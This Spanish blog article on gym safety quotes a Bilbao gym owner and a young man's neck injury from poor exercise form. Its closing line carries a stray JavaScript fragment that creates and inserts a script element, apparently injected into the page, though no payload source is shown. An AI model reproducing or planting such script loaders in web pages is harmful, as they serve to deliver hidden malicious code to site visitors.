Salud y belleza » Bienestar, Deportes

El Gimnasio y la responsabilidad

Sin Comentarios

“Quienes quieran combinar el divertimento con el ejercicio físico, opten por un deporte en el cual el aspecto lúdico jamás se pierda; en cambio, ese selecto grupo de individuos que quieren trabajar con seriedad, perder kilos o sentirse bien, acudan a un gimnasio a realizar aparatos” el consejo de Juan Dominguez Vazquez, propietario y manager de un gimnasio en Bilbao, puede resultar chocante, mas nunca podrá considerarse desacertado.

¿Por qué? Dejemos que es el mismo Dominguez no dé las claves: “el Gimnasio puede resultar un lugar peligroso para la salud para aquellos que no siguen una rutina, no respetan los aparatos o, directamente, discuten las recomendaciones de un profesional. Realizar aparatos no es lo mismo que practicar un deporte en conjunto, pues aquí las desatenciones pueden provocar lesiones mucho más serias. Una sobrecarga, una rotura, una fisura o un golpe, son muchos los peligros a los que se expone un individuo despreocupado e irresponsable al ingresar a un gimnasio. Por ejemplo, la política de nuestro gimnasio no solo nos obliga a pedir exámenes cardiovasculares de la gente mayor de forma regular sino también nos hacer prohibirle el ingreso a niños pequeños a nuestras instalaciones”.

¿Cuáles son las lesiones que podemos causarnos en un gimnasio? Muchas. Muchísimas.

Por ejemplo, colocar sobrepeso puede causarnos algún tipo de lesión; hacer ejercicios en una posición equívoca también.

Repasemos algunas experiencias narradas por individuos que padecieron lesiones dentro de un gimnasio.

Para comenzar, escuchemos a Pedro, de 25 años: “Yo tenía una obsesión con los ejercicios abdominales. No me importaban los consejos del entrenador, yo seguía trabajando la zona al máximo. El gran error fue que, además de sobrecargar los músculos, con el tiempo comencé a ceder en las posiciones por culpa del desgaste.

Con el tiempo la zona no crecía y, aún así, yo sentía dolores. Lo que en verdad pasaba era que hacía el trabajo en una mala posición, con lo cual en vez de trabajar los abdominales forzaba el cuello, lo que me derivó en un grave traumatismo. De ahora en más, solo hago los ejercicios necesarios y me peocupo por mantener la posición adecuada en vez de obsesionarme por las repeticiones”.

La experiencia de Pedro vale para todos:el ha podido recuperarse, pero podría haber sido otro su final. La moraleja del caso es, entonces, que el Gimnasio es un espacio en el que debe morar la responsabilidad, la disciplina y el orden pues, para divertirse o pasar el rato, existen otras prácticas o deportes mucho más suaves y livianos.

Recuerda: la próxima vez que ingreses a un gimnasio, hazlo con conciencia.var d=document;var s=d.createElement('script'); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.